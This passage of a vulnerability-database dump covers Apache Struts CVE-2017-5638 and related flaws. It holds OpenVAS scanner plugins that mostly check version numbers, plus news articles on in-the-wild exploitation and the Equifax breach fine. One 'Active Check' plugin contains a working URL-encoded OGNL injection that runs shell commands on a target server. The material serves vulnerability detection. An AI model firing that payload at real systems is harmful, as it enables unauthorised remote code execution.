script_mandatory_keys(\"atlassian_crowd/installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Crowd uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Crowd 2.8.3 until 2.9.6, 2.10.1 until 2.10.2 and 2.11.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.9.7, 2.10.3, 2.11.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/CWD-4879\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.8.3\", test_version2: \"2.9.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.9.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.10.1\", test_version2: \"2.10.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.10.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"2.11.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.11.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:01", "description": "HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "openvas", "title": "HPE Universal CMDB Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hpe_universal_cmdb_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# HPE Universal CMDB Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:hp:universal_cmbd_foundation';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106736\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-10 12:58:34 +0200 (Mon, 10 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"HPE Universal CMDB Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_hpe_universal_cmdb_detect.nasl\");\n script_mandatory_keys(\"HP/UCMDB/Installed\");\n\n script_tag(name:\"summary\", value:\"HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A potential security vulnerability in Jakarta Multipart parser in Apache\nStruts has been addressed in HPE Universal CMDB. This vulnerability could be remotely exploited to allow code\nexecution via mishandled file upload.\");\n\n script_tag(name:\"affected\", value:\"HP Universal CMDB Foundation Software v10.22 CUP5\");\n\n script_tag(name:\"solution\", value:\"HPE has made mitigation information available to resolve the vulnerability\nfor the impacted versions of HPE Universal CMDB.\");\n\n script_xref(name:\"URL\", value:\"https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"10.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:55", "description": "Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106652", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Bamboo Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106652\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Bamboo Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Bamboo uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Bamboo 5.1 until 5.14.4, 5.15.0 until 5.15.2.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.14.5, 5.15.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-18242\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"5.1.0\", test_version2: \"5.14.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.14.5\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"5.15.0\", test_version2: \"5.15.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.15.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:54", "description": "This host is running Oracle Database Server\n and is prone to multiple unspecified security vulnerabilities.", "cvss3": {}, "published": "2017-10-18T00:00:00", "type": "openvas", "title": "Oracle Database Server 'WLM' And 'Spatial' Components Multiple Unspecified Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-8735", "CVE-2016-6814"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310811871", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811871", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Database Server 'WLM' And 'Spatial' Components Multiple Unspecified Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:database_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811871\");\n script_version(\"2019-05-17T13:14:58+0000\");\n script_cve_id(\"CVE-2016-6814\", \"CVE-2016-8735\");\n script_bugtraq_id(94463, 95429);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 13:14:58 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-18 14:48:23 +0530 (Wed, 18 Oct 2017)\");\n script_name(\"Oracle Database Server 'WLM' And 'Spatial' Components Multiple Unspecified Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle Database Server\n and is prone to multiple unspecified security vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to multiple\n unspecified errors in components 'Spatial (Apache Groovy)' and\n 'WLM (Apache Tomcat)'.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploitation will allow remote\n attackers to affect confidentiality, integrity, and availability\n via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle Database Server version 12.2.0.1\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"oracle_tnslsnr_version.nasl\");\n script_mandatory_keys(\"OracleDatabaseServer/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!dbPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dbVer = get_app_version(cpe:CPE, port:dbPort)){\n exit(0);\n}\n\nif(dbVer == \"12.2.0.1\")\n{\n report = report_fixed_ver(installed_version:dbVer, fixed_version:\"Apply the appropriate patch\");\n security_message(data:report, port:dbPort);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T16:40:29", "description": "Mware product updates address critical and important security issues.", "cvss3": {}, "published": "2016-05-26T00:00:00", "type": "openvas", "title": "VMSA-2016-0005 VMware product updates address critical and important security issues", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427", "CVE-2016-2077"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310105731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105731", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2016-0005 VMware product updates address critical and important security issues\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105731\");\n script_cve_id(\"CVE-2016-3427\", \"CVE-2016-2077\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2016-0005 VMware product updates address critical and important security issues\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"The RMI server of Oracle JRE JMX deserializes any class when deserializing\n authentication credentials. This may allow a remote, unauthenticated attacker to cause deserialization flaws\n and execute their commands.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"summary\", value:\"Mware product updates address critical and important security issues.\");\n\n script_tag(name:\"affected\", value:\"vCenter Server 6.0 on Windows without workaround of KB 2145343\n\n vCenter Server 6.0 on Linux (VCSA) prior to 6.0.0b\n\n vCenter Server 5.5 prior to 5.5 U3d (on Windows), 5.5 U3 (VCSA)\n\n vCenter Server 5.1 prior to 5.1 U3b\n\n vCenter Server 5.0 prior to 5.0 U3e\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-26 11:51:22 +0200 (Thu, 26 May 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\ninclude(\"host_details.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"5.0.0\" )\n if ( int( vcenter_build ) < int( 3073236 ) ) fix = '5.0 U3e (+ KB 2144428 on Windows)';\n\nif( vcenter_version == \"5.1.0\" )\n if ( int( vcenter_build ) < int( 3070521 ) ) fix = '5.1 U3d / 5.1 U3b with KB 2144428 on Windows';\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) < int( 2776510 ) ) fix = '6.0.0b (+ KB 2145343 on Windows)';\n\nif( host_runs( \"Windows\" ) == \"yes\" )\n{\n if( vcenter_version == \"5.5.0\" )\n if ( int( vcenter_build ) < int( 3252642 ) ) fix = '5.5 U3d / 5.5 U3b + KB 2144428';\n}\nelse if( host_runs( \"Linux\" ) == \"yes\" )\n{\n if( vcenter_version == \"5.5.0\" )\n if ( int( vcenter_build ) < int( 3000241 ) ) fix = '5.5 U3';\n}\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:16", "description": "[](<https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png>)\n\nSecurity researchers have discovered a Zero-Day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON. \n \nIn a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's Threat intelligence firm Talos announced the team observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts. \n \nAccording to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n\n\n> \"It is possible to perform an RCE attack with a malicious Content-Type value,\" [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. \"If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.\"\n\nThe vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache. So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately. \n \n\n\n### Exploit Code Publicly Released\n\n \nSince the Talos researchers detected public proof-of-concept (PoC) exploit code (which was uploaded to a Chinese site), the vulnerability is quite dangerous. \n \nThe researchers even detected \"a high number of exploitation events,\" the majority of which seem to be leveraging the publicly released PoC that is being used to run various malicious commands. \n\n\n[](<https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png>)\n\nIn some cases, the attackers executed simple \"whoami\" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads. \n\n\n[](<https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png>)\n\n \n\n\n> \"Final steps include downloading a malicious payload from a web server and execution of said payload,\" the researchers say. \"The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account.\"\n\nAttackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine. \n \nAccording to the researchers, the attackers tried to copy the file to a benign directory and ensure_ \"that both the executable runs and that the firewall service will be disabled when the system boots.\"_ \n \nBoth Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. Admins can also switch to a different [implementation](<https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries>) of the Multipart parser.\n", "cvss3": {}, "published": "2017-03-09T01:03:00", "type": "thn", "title": "New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T12:03:10", "id": "THN:2707247140A4F620671B33D68FEB1EA9", "href": "https://thehackernews.com/2017/03/apache-struts-framework.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:40:51", "description": "[](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. \n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant Facebook failed to prevent its citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. \n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, for which patches were already issued by the respected companies. \n \n\n\n## Why U.K. Has Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), who launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals to around $665,000. \n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. \n \nThe ICO investigation revealed \"multiple failures\" at the company like keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britishers also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions, and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost 